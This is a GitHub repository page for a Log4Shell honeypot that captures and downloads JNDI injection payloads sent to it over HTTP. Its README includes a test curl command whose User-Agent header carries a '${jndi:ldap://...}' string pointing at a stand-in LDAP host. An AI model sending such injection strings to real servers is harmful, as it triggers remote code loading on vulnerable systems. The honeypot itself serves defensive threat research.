Skip to content
/ log4shell-honeypot Public

Log4j honeypot to capture payloads within HTTP headers, query parameters and POST requests.

14 stars 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

sysgoblin/log4shell-honeypot

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
extractor
extractor
 
 
payloads
payloads
 
 
responses
responses
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
docker-compose.yml
docker-compose.yml
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 
main.go
main.go
 
 

Repository files navigation

log4shell-honeypot

Catch and download log4shell payloads sent within HTTP headers, query parameters or POST data. Modified version of Adikso's minecraft honeypot

Setup

  1. git clone $repo
  2. docker-compose up
  3. Send payloads within a http header to $dockerip:$port

To add additional honeypots on different ports, copy and paste an existing service within docker-compose.yml, changing the service name, and alter the ports within ports and command.

curl --user-agent '${jndi:ldap://lmao.com:1389/a}' http://localhost:80

Payloads are saved within payloads/

Logs are printed to the screen by default, but can be retreived with docker inspect. e.g:

docker inspect --format='{{.LogPath}}' log4shell-honeypot_http_1 | xargs cat

About

Log4j honeypot to capture payloads within HTTP headers, query parameters and POST requests.

Topics

log4j log4j2 log4shell

Resources

Readme
Activity

Stars

14 stars

Watchers

3 watching

Forks

2 forks
Report repository

Languages